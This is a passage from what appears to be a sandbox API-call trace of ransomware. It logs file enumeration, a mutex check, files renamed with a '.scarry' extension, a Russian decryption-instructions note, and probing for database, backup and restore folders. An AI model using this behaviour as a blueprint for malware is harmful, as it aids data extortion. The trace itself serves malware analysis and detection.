lpLocalFileTime=0x18edc4) returned 1 [0109.092] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.092] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.092] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.092] GlobalUnlock (hMem=0x45000c) returned 0 [0109.092] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.092] GlobalLock (hMem=0x450004) returned 0x593998 [0109.092] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.092] GlobalUnlock (hMem=0x45000c) returned 0 [0109.092] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.092] GlobalUnlock (hMem=0x450004) returned 0 [0109.093] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.093] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305200, ftCreationTime.dwHighDateTime=0x1c2f1c2, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x28305200, ftLastWriteTime.dwHighDateTime=0x1c2f1c2, nFileSizeHigh=0x0, nFileSizeLow=0x84a48, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.EXE", cAlternateFileName="")) returned 1 [0109.093] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.093] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.093] GlobalLock (hMem=0x450004) returned 0x591988 [0109.093] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.093] GlobalUnlock (hMem=0x450004) returned 0 [0109.093] GlobalLock (hMem=0x450004) returned 0x591988 [0109.093] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.093] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.093] GlobalUnlock (hMem=0x450004) returned 0 [0109.093] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.093] GlobalUnlock (hMem=0x45000c) returned 0 [0109.093] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.093] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d107e00, ftCreationTime.dwHighDateTime=0x1bb541c, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5d107e00, ftLastWriteTime.dwHighDateTime=0x1bb541c, nFileSizeHigh=0x0, nFileSizeLow=0xabd, dwReserved0=0x0, dwReserved1=0x0, cFileName="JbFtmXNWtNN7aOjxZaYO12Z6l3wT581+.scarry", cAlternateFileName="JBFTMX~1.SCA")) returned 1 [0109.093] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.093] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.093] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.093] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.093] GlobalUnlock (hMem=0x45000c) returned 0 [0109.093] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.093] GlobalLock (hMem=0x450004) returned 0x593998 [0109.093] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.094] GlobalUnlock (hMem=0x45000c) returned 0 [0109.094] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.094] GlobalUnlock (hMem=0x450004) returned 0 [0109.094] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.094] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bd0200, ftCreationTime.dwHighDateTime=0x1be1298, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3bd0200, ftLastWriteTime.dwHighDateTime=0x1be1298, nFileSizeHigh=0x0, nFileSizeLow=0x2b174, dwReserved0=0x0, dwReserved1=0x0, cFileName="n9CDsSozE+uvBcVYS53KG0M5M9esrutb.scarry", cAlternateFileName="N9CDSS~1.SCA")) returned 1 [0109.094] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.094] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.094] GlobalLock (hMem=0x450004) returned 0x591988 [0109.094] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.094] GlobalUnlock (hMem=0x450004) returned 0 [0109.094] GlobalLock (hMem=0x450004) returned 0x591988 [0109.094] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.094] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.094] GlobalUnlock (hMem=0x450004) returned 0 [0109.094] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.094] GlobalUnlock (hMem=0x45000c) returned 0 [0109.094] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.094] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd8d32a0, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfd8d32a0, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfd8d32a0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", cAlternateFileName="D407~1.TXT")) returned 1 [0109.094] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.094] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.094] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.094] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.095] GlobalUnlock (hMem=0x45000c) returned 0 [0109.095] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.095] GlobalLock (hMem=0x450004) returned 0x593998 [0109.095] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.095] GlobalUnlock (hMem=0x45000c) returned 0 [0109.095] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.095] GlobalUnlock (hMem=0x450004) returned 0 [0109.095] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.095] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd8d32a0, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfd8d32a0, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfd8d32a0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", cAlternateFileName="D407~1.TXT")) returned 0 [0109.095] GetLastError () returned 0x12 [0109.095] FindClose (in: hFindFile=0x58b020 | out: hFindFile=0x58b020) returned 1 [0109.095] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EURO", cAlternateFileName="")) returned 1 [0109.095] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f104 | out: lpLocalFileTime=0x18f104) returned 1 [0109.095] FileTimeToDosDateTime (in: lpFileTime=0x18f104, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0109.096] GlobalLock (hMem=0x450004) returned 0x591988 [0109.096] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.096] GlobalUnlock (hMem=0x450004) returned 0 [0109.096] GlobalLock (hMem=0x450004) returned 0x591988 [0109.096] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.096] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.096] GlobalUnlock (hMem=0x450004) returned 0 [0109.096] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.096] GlobalUnlock (hMem=0x45000c) returned 0 [0109.096] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.096] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.131] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.131] GlobalUnlock (hMem=0x45000c) returned 0 [0109.131] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.131] GlobalLock (hMem=0x450004) returned 0x593998 [0109.131] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.131] GlobalUnlock (hMem=0x45000c) returned 0 [0109.131] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.131] GlobalUnlock (hMem=0x450004) returned 0 [0109.131] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.131] SysReAllocStringLen (in: pbstr=0x18f104*=0x0, psz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", len=0x33 | out: pbstr=0x18f104*="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO") returned 1 [0109.131] GlobalLock (hMem=0x450004) returned 0x591988 [0109.131] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.131] GlobalUnlock (hMem=0x450004) returned 0 [0109.131] GlobalLock (hMem=0x450004) returned 0x591988 [0109.131] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.131] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.131] GlobalUnlock (hMem=0x450004) returned 0 [0109.131] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.131] GlobalUnlock (hMem=0x45000c) returned 0 [0109.132] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Microsoft\\Exchange Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="䱈@퇸X퇌X企@\x18㼔V\x18\x1b")) returned 0xffffffff [0109.193] GetLastError () returned 0x3 [0109.193] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d360, cbMultiByte=26, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0109.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\ct Edition\\ition\\") returned 21 [0109.194] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Microsoft SQL Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@텤X企@\x18㽜V\x181")) returned 0xffffffff [0109.194] GetLastError () returned 0x2 [0109.194] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.194] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d360, cbMultiByte=21, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0109.194] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\ct Edition\\ition\\") returned 9 [0109.194] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Firebird", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@麌W企@\x18㟬X\x18;")) returned 0xffffffff [0109.195] GetLastError () returned 0x2 [0109.195] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.195] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0109.195] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\ct Edition\\ition\\") returned 8 [0109.195] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSSQL.1", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@퍴X企@\x18㧴X\x18D")) returned 0xffffffff [0109.195] GetLastError () returned 0x2 [0109.195] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.195] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0109.195] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\ition\\") returned 37 [0109.196] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@텤X企@\x18麌W\x18j")) returned 0xffffffff [0109.196] GetLastError () returned 0x2 [0109.196] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.196] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=37, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\ition\\") returned 37 [0109.196] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\ition\\") returned 6 [0109.196] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Adobe", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@퍴X企@\x18㟬X\x18q")) returned 0xffffffff [0109.196] GetLastError () returned 0x2 [0109.197] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.197] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="adobe\\麈WP") returned 6 [0109.197] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\ition\\") returned 7 [0109.197] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Oracle", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@堬X企@\x18㧴X\x18y")) returned 0xffffffff [0109.197] GetLastError () returned 0x2 [0109.197] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.197] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0109.197] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\ition\\") returned 7 [0109.198] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Archive", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@텤X企@\x18㟬X\x18\x81")) returned 0xffffffff [0109.198] GetLastError () returned 0x2 [0109.198] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.198] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0109.198] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\ition\\") returned 6 [0109.198] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Backup", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@퍴X企@\x18㧴X\x18\x88")) returned 0xffffffff [0109.198] GetLastError () returned 0x2 [0109.198] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.198] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="backup㟨X ") returned 6 [0109.199] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\ition\\") returned 6 [0109.199] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Reserv", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@堬X企@\x18㟬X\x18\x8f")) returned 0xffffffff [0109.199] GetLastError () returned 0x2 [0109.199] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.199] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="reserv㧰X ") returned 6 [0109.199] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\ition\\") returned 7 [0109.199] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Restore", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="鳜W䱠@텤X企@\x18㧴X\x18\x97")) returned 0xffffffff [0109.200] GetLastError () returned 0x2 [0109.200] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.200] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0109.200] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.200] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.200] GlobalUnlock (hMem=0x45000c) returned 0 [0109.200] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.200] GlobalLock (hMem=0x450004) returned 0x593998 [0109.200] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.200] GlobalUnlock (hMem=0x45000c) returned 0 [0109.200] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.200] GlobalUnlock (hMem=0x450004) returned 0 [0109.200] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.201] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0109.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aaa8, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0109.201] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.201] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18e97c, nSize=0x400 | 